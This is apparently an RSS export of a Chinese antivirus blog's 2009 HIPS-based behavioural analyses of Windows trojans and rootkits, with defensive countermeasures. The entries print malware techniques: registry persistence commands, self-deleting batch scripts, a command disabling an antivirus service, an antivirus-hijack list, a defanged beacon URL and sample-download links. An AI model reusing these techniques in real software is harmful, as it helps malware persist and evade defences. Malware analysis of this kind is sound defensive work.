<![CDATA[沁妍病毒行为分析室]]>

<![CDATA[沁妍病毒行为分析室]]> http://hi.baidu.com http://hi.baidu.com http://img.baidu.com/img/logo-hi.gif http://hi.baidu.com/eqsyssecurity zh-cn www.baidu.com 5 <![CDATA[行为分析 Backdoor.Win32.Ceckno.bjq]]> 病毒名称：Kaspersky：Backdoor.Win32.Ceckno.bjq
NOD32：probably a variant of Win32/Agent.RCW
Rising：Trojan.PSW.Win32.GameOL.nvi
VT扫描时间：2009.12.02 05:39:58 (UTC)
EQS Lab编号：091202332
EQS Lab地址：http://hi.baidu.com/eqsyssecurity
病毒大小：26.5 KB (27,217 字节)
MD5码：447607371E82D54F6D604EF312E7934C
伪造数字签名：-
测试平台： WinXP SP3系统 EQSecurity（HIPS）实机
测试说明：http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html

病毒行为：
注：本分析可能为多次运行测试结果汇总因此时间可能会混乱

运行后向system32写入dll

2009-12-02 13:33:15 创建文件
进程路径:E:\KIA\5\5.exe
文件路径:C:\WINDOWS\system32\msvcrt25.dll
触发规则:所有程序规则->系统核心目录Ⅰ->%systemroot%\*.dll

调用劫持ie

2009-12-02 13:33:22 运行应用程序
进程路径:E:\KIA\5\5.exe
文件路径:C:\Program Files\Internet Explorer\IEXPLORE.EXE
触发规则:所有程序规则->进程保护->C:\Program Files\Internet Explorer\IEXPLORE.exe

2009-12-02 13:33:23 修改其它进程内存
进程路径:E:\KIA\5\5.exe
目标进程:C:\Program Files\Internet Explorer\IEXPLORE.EXE
触发规则:所有程序规则->进程保护->C:\Program Files\Internet Explorer\IEXPLORE.exe

2009-12-02 13:33:42 创建远程线程
进程路径:E:\KIA\5\5.exe
目标进程:C:\Program Files\Internet Explorer\IEXPLORE.EXE
触发规则:所有程序规则->进程保护->C:\Program Files\Internet Explorer\IEXPLORE.exe

向system32写入exe

2009-12-02 13:33:46 创建文件
进程路径:E:\KIA\5\5.exe
文件路径:C:\WINDOWS\system32\msvcrty.exe
触发规则:所有程序规则->系统核心目录Ⅰ->%systemroot%\*.exe

修改Userinit启动项

2009-12-02 13:34:11 修改注册表内容
进程路径:C:\Program Files\Internet Explorer\IEXPLORE.EXE
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
注册表名称:Userinit
更改后:C:\WINDOWS\system32\userinit.exe,,C:\WINDOWS\system32\msvcrty.exe
更改前:C:\WINDOWS\system32\userinit.exe,
触发规则:所有程序规则->自动启动->HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

自删除

2009-12-02 13:34:19 运行应用程序
进程路径:E:\KIA\5\5.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c del E:\KIA\5\5.exe > nul
触发规则:高优先规则->In Side->%systemroot%\system32\cmd.exe

联网行为：

关键行为：

向系统目录创建dll exe

修改Userinit启动项

劫持ie进程

防范对策：

使用HIPS阻止陌生程序向系统目录创建dll exe

使用HIPS阻止程序修改Userinit启动项

使用HIPS阻止陌生程序劫持ie进程

样本下载：http://bbs.janmeng.com/thread-906574-1-1.html

阅读全文
类别：反病毒查看评论]]> 2009年12月02日星期三 13:58 http://hi.baidu.com/eqsyssecurity/blog/item/baf6d2232324b6449358077b.html <![CDATA[行为分析 Trojan.Win32.Regrun.dnl]]> 病毒名称：Kaspersky：Trojan.Win32.Regrun.dnl
NOD32：Win32/Kryptik.BDM.Gen
Rising：Dropper.Win32.Undef.alm
VT扫描时间：2009.12.02 05:10:30 (UTC)
EQS Lab编号：091202331
EQS Lab地址：http://hi.baidu.com/eqsyssecurity
病毒大小：23.5 KB (24,064 字节)
MD5码：11D1131EB5153C15BB1D81D4A50989C6
伪造数字签名：-
测试平台： WinXP SP3系统 EQSecurity（HIPS）实机
测试说明：http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html

病毒行为：
注：本分析可能为多次运行测试结果汇总因此时间可能会混乱

运行后改名复制自身到TEMP目录

2009-12-02 13:27:16 运行应用程序
进程路径:E:\KIA\2\2.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c copy "E:\KIA\2\2.exe" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svchost.exe"
触发规则:高优先规则->In Side->%systemroot%\system32\cmd.exe

调用

2009-12-02 13:27:25 运行应用程序
进程路径:E:\KIA\2\2.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svchost.exe"
触发规则:高优先规则->In Side->%systemroot%\system32\cmd.exe

添加系统防火墙放行列表

2009-12-02 13:27:40 创建注册表值
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess \Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
注册表名称:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svchost.exe
触发规则:所有程序规则->网络相关->HKEY_LOCAL_MACHINE\SYSTEM\*ControlSet*\Services\SharedAccess\Parameters\FirewallPolicy*

修改Winlogon启动项

2009-12-02 13:27:47 修改注册表内容
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
注册表名称:shell
更改后:Explorer.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svchost.exe
更改前:C:\PROGRA~1\BlackBox\blackbox.exe
触发规则:所有程序规则->WinLogon->*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon*

下载exe

2009-12-02 13:28:56 创建文件
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\system.exe
触发规则:所有程序规则->Documents and Settings->?:\Documents and Settings\*.exe

联网行为：

关键行为：

修改Winlogon启动项

调用cmd.exe

防范对策：

使用HIPS阻止陌生程序修改Winlogon启动项

使用HIPS阻止陌生程序调用cmd.exe

使用HIPS阻止陌生程序添加系统防火墙放行列表

样本下载：http://bbs.janmeng.com/thread-906573-1-1.html

阅读全文
类别：反病毒查看评论]]> 2009年12月02日星期三 13:58 http://hi.baidu.com/eqsyssecurity/blog/item/a65969fbd0668d284e4aea7b.html <![CDATA[行为分析 Rootkit.Win32.Agent.gyh]]> 病毒名称：Kaspersky：Rootkit.Win32.Agent.gyh
NOD32：Win32/Agent.OCX
Rising：Dropper.Win32.Undef.nn
VT扫描时间：2009.12.02 05:08:15 (UTC)
EQS Lab编号：091202330
EQS Lab地址：http://hi.baidu.com/eqsyssecurity
病毒大小：37.0 KB (37,888 字节)
MD5码：323A3C29BEBA106654EA26CFBE038B75
伪造数字签名：-
测试平台： WinXP SP3系统 EQSecurity（HIPS）实机
测试说明：http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html

病毒行为：
注：本分析可能为多次运行测试结果汇总因此时间可能会混乱

运行后向system32目录写入dll

2009-12-02 13:24:22 创建文件
进程路径:E:\KIA\1\1.exe
文件路径:C:\WINDOWS\system32\BhhD.dll
触发规则:所有程序规则->系统核心目录Ⅰ->%systemroot%\*.dll

向drivers目录写入sys

2009-12-02 13:24:47 创建文件
进程路径:E:\KIA\1\1.exe
文件路径:C:\WINDOWS\system32\drivers\ojbst.sys
触发规则:所有程序规则->系统核心目录Ⅰ->%systemroot%\system32\drivers\*

SCM 安装服务或驱动

2009-12-02 13:24:57 访问服务管理器
进程路径:E:\KIA\1\1.exe
触发规则:所有程序规则->*

2009-12-02 13:24:59 安装服务或者驱动
进程路径:C:\WINDOWS\system32\services.exe
文件路径:C:\WINDOWS\system32\drivers\ojbst.sys
触发规则:所有程序规则->威胁提示Ⅲ->%systemroot%\*

创建自删除BAT 调用

2009-12-02 13:25:06 创建文件
进程路径:E:\KIA\1\1.exe
文件路径:C:\WINDOWS\system32\9H72J8.bat
触发规则:所有程序规则->系统核心目录Ⅰ->%systemroot%\*.bat

2009-12-02 13:25:18 运行应用程序
进程路径:E:\KIA\1\1.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c C:\WINDOWS\system32\9H72J8.bat
触发规则:高优先规则->In Side->%systemroot%\system32\cmd.exe

ping -n 3 127.0.0.1>nul
:Repeat
del "E:\KIA\1\1.exe"
if exist "E:\KIA\1\1.exe" goto Repeat
cd C:\
del %0

联网行为：

关键行为：

向系统目录创建dll sys

SCM 安装服务或驱动

防范对策：

使用HIPS阻止陌生程序向系统目录创建dll sys

使用HIPS阻止陌生程序SCM 安装服务或驱动

使用HIPS阻止陌生程序调用CMD.EXE

样本下载：http://bbs.janmeng.com/thread-906572-1-1.html

阅读全文
类别：反病毒查看评论]]> 2009年12月02日星期三 13:57 http://hi.baidu.com/eqsyssecurity/blog/item/85ab90367ec0ced7a2cc2b7a.html <![CDATA[行为分析 Trojan-Downloader.Win32.Geral.msi]]> 病毒名称：Kaspersky：Trojan-Downloader.Win32.Geral.msi
NOD32：a variant of Win32/AutoRun.KillAV.D
Rising：Trojan.Win32.Generic.51F1E26E
VT扫描时间：2009.11.29 04:49:34 (UTC)
EQS Lab编号：091129329
EQS Lab地址：http://hi.baidu.com/eqsyssecurity
病毒大小：25.7 KB (26,320 字节)
MD5码：211E0F039906196037C70A2B09377381
伪造数字签名：-
测试平台： WinXP SP3系统 EQSecurity（HIPS）实机
测试说明：http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html

病毒行为：
注：本分析可能为多次运行测试结果汇总因此时间可能会混乱

运行后修改taskmgr.exe

2009-11-29 13:48:18 修改文件
进程路径:E:\KIA\3\3.exe
文件路径:C:\WINDOWS\system32\taskmgr.exe
触发规则:所有程序规则->系统核心目录Ⅱ->%systemroot%\*.exe

创建PendingFileRenameOperations启动项

2009-11-29 13:48:28 创建注册表值
进程路径:E:\KIA\3\3.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
注册表名称:PendingFileRenameOperations
触发规则:所有程序规则->自动启动->*\SYSTEM\ControlSet*\Control\Session Manager

向C根目录创建dll 并调用

2009-11-29 13:49:16 创建文件
进程路径:E:\KIA\3\3.exe
文件路径:C:\tyn.dll
触发规则:所有程序规则->文件阻止及保护->?:\*.dll

2009-11-29 13:49:38 运行应用程序
进程路径:E:\KIA\3\3.exe
文件路径:C:\WINDOWS\system32\rundll32.exe
命令行:C:\tyn.dll,RKTV
触发规则:所有程序规则->系统工具->%systemroot%\system32\rundll32.exe

向字体目录创建sys

2009-11-29 13:51:01 创建文件
进程路径:C:\WINDOWS\system32\rundll32.exe
文件路径:C:\WINDOWS\Fonts\pci.sys
触发规则:所有程序规则->系统核心目录Ⅰ->%systemroot%\Fonts\*.sys

SCM 安装服务或驱动

2009-11-29 13:51:08 访问服务管理器
进程路径:C:\WINDOWS\system32\rundll32.exe
触发规则:应用程序规则->父进程威胁提示Ⅲ->%systemroot%\*

2009-11-29 14:08:02 安装服务或者驱动
进程路径:C:\WINDOWS\system32\services.exe
文件路径:C:\WINDOWS\Fonts\pci.sys
触发规则:所有程序规则->威胁提示Ⅰ->%systemroot%\Fonts\*

删除DLL

2009-11-29 13:51:14 删除文件
进程路径:E:\KIA\3\3.exe
文件路径:C:\tyn.dll
触发规则:所有程序规则->文件阻止及保护->?:\*.dll

修改AVP服务

2009-11-29 14:08:25 运行应用程序
进程路径:E:\KIA\3\3.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c sc config avp start= disabled
触发规则:高优先规则->In Side->%systemroot%\system32\cmd.exe

加载TEMP目录库文件

2009-11-29 13:51:46 加载库文件
进程路径:E:\KIA\3\3.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\dll29.tmp
触发规则:所有程序规则->威胁提示Ⅰ->?:\Documents and Settings\*\Local Settings\Temp\*

创建映像劫持

2009-11-29 13:51:54 创建注册表值
进程路径:E:\KIA\3\3.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.EXE
注册表名称:[Key]
触发规则:所有程序规则->安全设置项->*\SOFTWARE\Microsoft\Windows*\CurrentVersion\Image File Execution Options*

360upp.EXE 360safeup.EXE 360sd.EXE 360rp.EXE arpfw.EXE ZhuDongFangYu.EXE krnl360svc.EXE 360safe.EXE 360tray.EXE 360safebox.EXE safeboxTray.EXE LiveUpdate360.EXE AvMonitor.EXE Ravservice.EXE RAVTRAY.EXE CCenter.EXE RavMonD.EXE RavMon.EXE IceSword.EXE Iparmor.EXE KVWSC.EXE RavTask.EXE KVMonxp.KXP KVSrvXP.EXE Navapsvc.EXE Nod32kui.EXE nod32krn.EXE ekrn.EXE egui.EXE KRegEx.EXE Frameworkservice.EXE Mmsk.EXE Ast.EXE avp.EXE WOPTILITIES.EXE Regedit.EXE AutoRunKiller.EXE VPC32.EXE VPTRAY.EXE ANTIARP.EXE RAV.EXE KASARP.EXE kwatch.EXE kavstart.EXE KSWebShield.EXE KAVPFW.EXE Runiep.EXE GuardField.EXE GFUpd.EXE Rfwstub.EXE rfwmain.EXE RavStub.EXE ScanFrm.EXE RsAgent.EXE RsMain.EXE Rsaupd.EXE rfwProxy.EXE rfwsrv.EXE SREngLdr.EXE ArSwp.EXE RSTray.EXE TrojanDetector.EXE RSTray.EXE Trojanwall.EXE TrojDie.KXP PFW.EXE HijackThis.EXE AutoRun.EXE KpfwSvc.EXE kissvc.EXE kav32.EXE VsTskMgr.EXE naPrdMgr.EXE ccEvtMgr.EXE VsTskMgr.EXE mcshield.EXE

向各盘根目录创建AUTORUN.INF PIF

2009-11-29 13:52:23 创建文件
进程路径:E:\KIA\3\3.exe
文件路径:C:\AUTORUN.INF
触发规则:所有程序规则->文件阻止及保护->?:\autorun.inf

2009-11-29 14:10:03 修改文件
进程路径:E:\KIA\3\3.exe
文件路径:C:\ZU.PIF
触发规则:所有程序规则->文件阻止及保护->?:\*.pif

2009-11-29 14:10:03 创建文件    操作:阻止
进程路径:E:\KIA\3\3.exe
文件路径:D:\AUTORUN.INF
触发规则:所有程序规则->文件阻止及保护->?:\autorun.inf

2009-11-29 14:10:05 创建文件    操作:阻止
进程路径:E:\KIA\3\3.exe
文件路径:D:\ZU.PIF
触发规则:所有程序规则->文件阻止及保护->?:\*.pif

联网行为：

关键行为：

向系统目录创建dll sys

SCM 安装服务或驱动

创建映像劫持

向各盘根目录创建AUTORUN.INF  PIF

防范对策：

使用HIPS阻止陌生程序向系统目录创建dll sys

使用HIPS阻止程序SCM 安装服务或驱动

使用HIPS阻止陌生程序创建映像劫持

使用HIPS阻止陌生程序向各盘根目录创建AUTORUN.INF  PIF

使用HIPS阻止陌生程序修改taskmgr.exe

使用HIPS阻止陌生程序创建PendingFileRenameOperations启动项

使用HIPS阻止陌生程序调用rundll32.exe  cmd.exe

样本下载：http://bbs.janmeng.com/thread-906075-1-1.html

阅读全文
类别：反病毒查看评论]]> 2009年11月29日星期日 14:41 http://hi.baidu.com/eqsyssecurity/blog/item/3db946160e9b775bf2de3274.html <![CDATA[[行为分析] Trojan-Downloader.Win32.Mufanom.ghk]]> 病毒名称：Kaspersky：Trojan-Downloader.Win32.Mufanom.ghk
NOD32：Win32/Cimag.BB
Rising：Trojan.Win32.Generic.51F238D5
VT扫描时间：2009.11.29 04:46:07 (UTC)
EQS Lab编号：091129328
EQS Lab地址：http://hi.baidu.com/eqsyssecurity
病毒大小：51.5 KB (52,736 字节)
MD5码：6EE09A6A01FF745B4684F730DFE68AFF
伪造数字签名：-
测试平台： WinXP SP3系统    EQSecurity（HIPS）实机
测试说明：http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html

病毒行为：
注：本分析可能为多次运行测试结果汇总  因此时间可能会混乱

运行后向windows目录写入dll  并调用

2009-11-29 13:43:53 创建文件
进程路径:E:\KIA\2\2.exe
文件路径:C:\WINDOWS\nwuicrv.dll
触发规则:所有程序规则->系统核心目录Ⅰ->%systemroot%\*.dll

2009-11-29 13:44:04 运行应用程序
进程路径:E:\KIA\2\2.exe
文件路径:C:\WINDOWS\system32\rundll32.exe
命令行:"C:\WINDOWS\nwuicrv.dll",Startup
触发规则:所有程序规则->系统工具->%systemroot%\system32\rundll32.exe

修改LSA安全设置

2009-11-29 13:44:20 修改注册表内容
进程路径:C:\WINDOWS\system32\rundll32.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa
注册表名称:Notification Packages
更改后:scecli
触发规则:所有程序规则->安全设置项->HKEY_LOCAL_MACHINE\SYSTEM\*ControlSet*\Control\Lsa

调用dll

2009-11-29 13:44:50 运行应用程序
进程路径:C:\WINDOWS\system32\rundll32.exe
文件路径:C:\WINDOWS\system32\rundll32.exe
命令行:"C:\WINDOWS\nwuicrv.dll",iep
触发规则:应用程序规则->系统程序->%systemroot%\system32\rundll32.exe->%systemroot%\system32\rundll32.exe

安装钩子

2009-11-29 13:45:11 安装全局钩子
进程路径:C:\WINDOWS\system32\rundll32.exe
文件路径:C:\WINDOWS\nwuicrv.dll
钩子类型:WH_GETMESSAGE
触发规则:所有程序规则->威胁提示Ⅱ->%systemroot%\*

联网行为：

关键行为：

向系统目录创建dll

修改LSA注册表

安装钩子

防范对策：

使用HIPS阻止陌生程序向系统目录创建dll

使用HIPS阻止程序修改LSA注册表

使用HIPS阻止程序安装钩子

使用HIPS阻止陌生程序调用rundll32.exe

样本下载：http://bbs.janmeng.com/thread-906073-1-1.html

阅读全文
类别：反病毒查看评论]]> 2009年11月29日星期日 14:40 http://hi.baidu.com/eqsyssecurity/blog/item/94ab123d53aee3cd9e3d626b.html <![CDATA[[行为分析] Trojan-Downloader.Win32.Agent.aifd]]> 病毒名称：Kaspersky：Trojan-Downloader.Win32.Agent.aifd
NOD32：Win32/TrojanDownloader.Agent.AIFD
Rising：Trojan.DL.Win32.Mnless.bqd
VT扫描时间：2009.11.29 04:38:51 (UTC)
EQS Lab编号：091129327
EQS Lab地址：http://hi.baidu.com/eqsyssecurity
病毒大小：52.0 KB (53,280 字节)
MD5码：3DDCD8ADD507CB1AA5E42F1D924E8AE6
伪造数字签名：-
测试平台： WinXP SP3系统    EQSecurity（HIPS）实机
测试说明：http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html

病毒行为：
注：本分析可能为多次运行测试结果汇总  因此时间可能会混乱

运行后向system32目录写入dll  并设置隐藏属性

2009-11-29 13:33:54 创建文件
进程路径:E:\KIA\1\1.exe
文件路径:C:\WINDOWS\system32\sinx32.dll
触发规则:所有程序规则->系统核心目录Ⅰ->%systemroot%\*.dll

2009-11-29 13:34:02 修改文件
进程路径:E:\KIA\1\1.exe
文件路径:(隐藏文件)C:\WINDOWS\system32\sinx32.dll
触发规则:所有程序规则->系统核心目录Ⅱ->%systemroot%\*.dll

调用dll

2009-11-29 13:34:15 运行应用程序
进程路径:E:\KIA\1\1.exe
文件路径:C:\WINDOWS\system32\rundll32.exe
命令行:C:\WINDOWS\system32\sinx32.dll InsertTo *E:\KIA\1\1.exe
触发规则:所有程序规则->系统工具->%systemroot%\system32\rundll32.exe

劫持winlogon.exe进程

2009-11-29 13:34:28 修改其它进程内存
进程路径:C:\WINDOWS\system32\rundll32.exe
目标进程:C:\WINDOWS\system32\winlogon.exe
触发规则:所有程序规则->进程保护->%systemroot%\system32\winlogon.exe

2009-11-29 13:34:38 创建远程线程
进程路径:C:\WINDOWS\system32\rundll32.exe
目标进程:C:\WINDOWS\system32\winlogon.exe
触发规则:所有程序规则->进程保护->%systemroot%\system32\winlogon.exe

2009-11-29 13:34:48 加载库文件
进程路径:C:\WINDOWS\system32\winlogon.exe
文件路径:C:\WINDOWS\system32\sinx32.dll
触发规则:所有程序规则->*

调用修改IE进程内存

2009-11-29 13:34:58 运行应用程序
进程路径:C:\WINDOWS\system32\winlogon.exe
文件路径:C:\Program Files\Internet Explorer\IEXPLORE.EXE
触发规则:所有程序规则->进程保护->C:\Program Files\Internet Explorer\IEXPLORE.exe

2009-11-29 13:34:58 修改其它进程内存
进程路径:C:\WINDOWS\system32\winlogon.exe
目标进程:C:\Program Files\Internet Explorer\IEXPLORE.EXE
触发规则:所有程序规则->进程保护->C:\Program Files\Internet Explorer\IEXPLORE.exe

安装钩子

2009-11-29 13:35:09 安装全局钩子
进程路径:C:\WINDOWS\system32\winlogon.exe
文件路径:sinx32.dll
钩子类型:WH_JOURNALRECORD
触发规则:应用程序规则->系统程序->%systemroot%\system32\winlogon.exe

联网行为：

关键行为：

向系统目录创建dll

调用rundll32.exe IEXPLORE.exe

劫持winlogon进程

安装钩子

防范对策：

使用HIPS阻止陌生程序向系统目录创建dll

使用HIPS阻止陌生程序调用rundll32.exe IEXPLORE.exe

使用HIPS阻止陌生程序劫持winlogon进程

使用HIPS阻止程序安装钩子

样本下载：http://bbs.janmeng.com/thread-906072-1-1.html

阅读全文
类别：反病毒查看评论]]> 2009年11月29日星期日 14:39 http://hi.baidu.com/eqsyssecurity/blog/item/805259020ecf7c054afb516a.html <![CDATA[农夫果园水溶C100含砒霜？]]>
类别：杂谈查看评论]]> 2009年11月29日星期日 01:58 http://hi.baidu.com/eqsyssecurity/blog/item/7474fc7fe279d00229388a61.html <![CDATA[行为分析魔兽盗号木马 Trojan.Win32.Generic.51EE4B13]]> 病毒名称：Kaspersky：-
NOD32：-
Rising：Trojan.Win32.Generic.51EE4B13
VT扫描时间：2009.11.28 04:46:30 (UTC)
EQS Lab编号：091128326
EQS Lab地址：http://hi.baidu.com/eqsyssecurity
病毒大小：35.9 KB (36,784 字节)
MD5码：18A7CAD19056512A0E0DD7DB9F8B6A9E
伪造数字签名：-
测试平台： WinXP SP3系统 EQSecurity（HIPS）实机
测试说明：http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html

病毒行为：
注：本分析可能为多次运行测试结果汇总因此时间可能会混乱

运行后向魔兽世界目录写入dll

2009-11-28 12:46:50 创建文件
进程路径:E:\KIA\1.exe
文件路径:E:\Games\World of Warcraft\syslpk.dll
触发规则:所有程序规则->文件阻止及保护->?:\*.dll

2009-11-28 12:46:56 创建文件
进程路径:E:\KIA\1.exe
文件路径:E:\Games\World of Warcraft\lpk.dll
触发规则:所有程序规则->文件阻止及保护->?:\*.dll

2009-11-28 12:47:01 创建文件
进程路径:E:\KIA\1.exe
文件路径:E:\Games\World of Warcraft\sysText.dll
触发规则:所有程序规则->文件阻止及保护->?:\*.dll

联网行为：

关键行为：

向魔兽世界目录写入dll

防范对策：

使用HIPS阻止陌生程序向魔兽世界目录写入dll

样本下载：http://bbs.janmeng.com/thread-905906-1-1.html

阅读全文
类别：反病毒查看评论]]> 2009年11月28日星期六 13:07 http://hi.baidu.com/eqsyssecurity/blog/item/3922be38dc91442997ddd891.html <![CDATA[行为分析 Trojan-Downloader.Win32.Xanda.r]]> 病毒名称：Kaspersky：Trojan-Downloader.Win32.Xanda.r
NOD32：probably a variant of Win32/VB.OEA
Rising：Trojan.Win32.Generic.51F06AE5
VT扫描时间：2009.11.27 05:11:18 (UTC)
EQS Lab编号：091127325
EQS Lab地址：http://hi.baidu.com/eqsyssecurity
病毒大小：88.0 KB (90,112 字节)
MD5码：2A496F7A0F1AD38EEAAB6A666ABC6A72
伪造数字签名：-
测试平台： WinXP SP3系统 EQSecurity（HIPS）实机
测试说明：http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html

病毒行为：
注：本分析可能为多次运行测试结果汇总因此时间可能会混乱

运行后向system32目录写入dll bat

2009-11-27 13:19:05 创建文件
进程路径:E:\KIA\2\2.exe
文件路径:C:\WINDOWS\system32\MySysDL32.dll
触发规则:所有程序规则->系统核心目录Ⅰ->%systemroot%\*.dll

2009-11-27 13:19:14 创建文件
进程路径:E:\KIA\2\2.exe
文件路径:C:\WINDOWS\system32\206.9361.bat
触发规则:所有程序规则->系统核心目录Ⅰ->%systemroot%\*.bat

BAT内容

ping 127.1
copy "E:\KIA\2\2.exe","C:\WINDOWS\system32\MySysDL32.exe"
del.exe "E:\KIA\2\2.exe"
start "" "C:\WINDOWS\system32\MySysDL32.exe"
del %0

调用BAT

2009-11-27 13:19:34 运行应用程序
进程路径:E:\KIA\2\2.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c C:\WINDOWS\system32\206.9361.bat
触发规则:高优先规则->In Side->%systemroot%\system32\cmd.exe

2009-11-27 13:19:41 创建文件
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\MySysDL32.exe
触发规则:所有程序规则->系统核心目录Ⅰ->%systemroot%\*.exe

2009-11-27 13:19:48 运行应用程序
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\MySysDL32.exe
触发规则:所有程序规则->威胁提示Ⅰ->%systemroot%\*

以命令行添加注册表

2009-11-27 13:20:16 运行应用程序
进程路径:C:\WINDOWS\system32\MySysDL32.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:Add "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t "REG_SZ" /d "explorer.exe,C:\WINDOWS\system32\MySysDL32.exe" /f
触发规则:所有程序规则->系统工具->%systemroot%\system32\reg.exe

2009-11-27 13:20:29 运行应用程序
进程路径:C:\WINDOWS\system32\MySysDL32.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:Add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A4BD931D-77A3-491F-A76D-12F8153455F0}"
触发规则:所有程序规则->系统工具->%systemroot%\system32\reg.exe

2009-11-27 13:20:32 运行应用程序
进程路径:C:\WINDOWS\system32\MySysDL32.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t "REG_DWORD" /d "1" /f
触发规则:所有程序规则->系统工具->%systemroot%\system32\reg.exe

2009-11-27 13:20:35 运行应用程序
进程路径:C:\WINDOWS\system32\MySysDL32.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t "REG_DWORD" /d "1" /f
触发规则:所有程序规则->系统工具->%systemroot%\system32\reg.exe

替换桌面IE快捷方式

2009-11-27 13:20:35 删除文件
进程路径:C:\WINDOWS\system32\MySysDL32.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk
触发规则:所有程序规则->Documents and Settings->?:\Documents and Settings\*\Application Data\*

2009-11-27 13:20:50 创建文件
进程路径:C:\WINDOWS\system32\MySysDL32.exe
文件路径:C:\Documents and Settings\Administrator\桌面\Internet Explorer.lnk
触发规则:所有程序规则->Documents and Settings->?:\Documents and Settings\*\桌面\*

IE快捷方式指向

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" hXXp://www.qnrwz.com

调用DCOM服务COM接口

2009-11-27 13:21:08 远程调用COM对象
进程路径:C:\WINDOWS\system32\MySysDL32.exe
{8BC3F05E-D86B-11D0-A075-00C04FB68820}
触发规则:所有程序规则->COM->{8BC3F05E-D86B-11D0-A075-00C04FB68820}

结束进程

2009-11-27 13:21:30 运行应用程序
进程路径:C:\WINDOWS\system32\MySysDL32.exe
文件路径:C:\WINDOWS\system32\taskkill.exe
命令行:/f /im rstray.exe
触发规则:所有程序规则->系统工具->%systemroot%\system32\taskkill.exe

调用IE

2009-11-27 13:21:37 运行应用程序
进程路径:C:\WINDOWS\system32\MySysDL32.exe
文件路径:C:\Program Files\Internet Explorer\IEXPLORE.EXE
命令行:"hXXp://www.qnrwz.com/tongji2/count.asp?mac=-----------&ver=1.0"
触发规则:所有程序规则->进程保护->C:\Program Files\Internet Explorer\IEXPLORE.exe

联网行为：

关键行为：

向系统目录创建dll bat exe

调用reg.exe cmd.exe IEXPLORE.EXE

防范对策：

使用HIPS阻止陌生程序向系统目录创建dll bat exe

使用HIPS阻止陌生程序调用reg.exe cmd.exe IEXPLORE.EXE taskkill.exe

使用HIPS阻止陌生程序替换桌面IE快捷方式

使用HIPS阻止陌生程序调用DCOM服务COM接口

样本下载：http://bbs.janmeng.com/thread-905762-1-1.html

阅读全文
类别：反病毒查看评论]]> 2009年11月27日星期五 13:45 http://hi.baidu.com/eqsyssecurity/blog/item/084f70645cceaafaf636544b.html <![CDATA[行为分析 a variant of Win32/Kryptik.BEK]]> 病毒名称：Kaspersky：-
NOD32：a variant of Win32/Kryptik.BEK
Rising：-
VT扫描时间：2009.11.23 18:58:57 (UTC)
EQS Lab编号：091126324
EQS Lab地址：http://hi.baidu.com/eqsyssecurity
病毒大小：113 KB (116,496 字节)
MD5码：B98D8E8AA2E00B633A981A4519D93119
伪造数字签名：-
测试平台： WinXP SP3系统 EQSecurity（HIPS）实机
测试说明：http://hi.baidu.com/eqsyssecurit ... 5b15c57831aa7c.html

病毒行为：
注：本分析可能为多次运行测试结果汇总因此时间可能会混乱

运行后向system32写入exe

2009-11-26 14:26:49 创建文件
进程路径:E:\KIA\1\1.exe
文件路径:C:\WINDOWS\system32\wsnpoema.exe
触发规则:所有程序规则->系统核心目录Ⅰ->%systemroot%\*.exe

修改winlogon启动项

2009-11-26 14:26:57 修改注册表内容
进程路径:E:\KIA\1\1.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
注册表名称:userinit
